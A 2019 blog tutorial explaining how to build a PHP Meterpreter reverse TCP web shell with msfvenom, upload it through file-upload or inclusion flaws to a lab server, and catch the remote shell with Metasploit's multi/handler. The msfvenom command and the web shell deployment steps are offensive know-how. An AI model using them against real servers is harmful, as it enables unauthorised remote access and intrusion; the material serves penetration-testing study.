Reverse tcp shell with metasploit

HacksLand | The computer science playground

Posted by Thilan Dissanayaka on Aug 12, 2019
Metasploit is an awesome tool. It can be used to automate the exploitation process , generate shell codes , use as a listener etc. I hope to start a tutorial serious on metasploit framework and it's partner programs. So in today tutorial we are going to see how we can use metasploit and msfvenom for create a web shell in PHP. It can create a reverse TCP connection to our mashing. So let's start. first we use msfvenom for create our shell.
msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555
Hear we have supplied many arguments to msfvenom tool. Let's see what they do. -p stands for payload. It tell which payload we want to use. Hear we used meterpreter as the payload. You can get the list of available payloads with the command msfvenom --list payloads. Since we want to make a shell for web we choose php. -o This is output format. We have specified shell.php. So our output file will be saved as shell.php. LHOST is the IP of attacker mashing. It should be our public IP. LPORT is any opened port on our mashing. msfvenom-shel-created You can see we have generated our shell as a php file. Now we can use any method like RFI , FUV etc to upload this to a server. I'll use web for pentester vulnerable mashing. Before we execute our shell we want to set a listener for catch our connection. Now we start metasploit framework. There are number of options to use metasploit  like msfcli, msfweb interface , armitage , msfconsole etc. In many times we use msfconsole for this. msfconsole-main-screen Yes , a beautiful interface. This is an interactive shell and we can use it easily. First we want to set a handler for our connection. Handler is responsible for handle reverse connection. Hear we have used multi/handler .  You can set it with use exploit command. msf-exploit-selected Now we have to set some extra options. Any time in msfconsole you can find which options you want to set by entering the command show options . msf-payload-set In above pic we can see we need to set LHOST and LPORT. Let's set them. Both of them are same as what we used in generating our shell. msf-lport-and-lhost OK now  is the time to attack. We use command run to start the process. msf-final-exploit IT is waiting for an incoming connection. Now we can execute our shell on web server. msf-exploit-succes Yes. It worked. we got our metepreter shell. Now we can do many things. I'll post another tutorial on meterpreter. Till then you can see what to do with command help .  :-)

Hi, I'm Thilan. An engineering student from SriLanka. I love to code with Python, JavaScript PHP and C.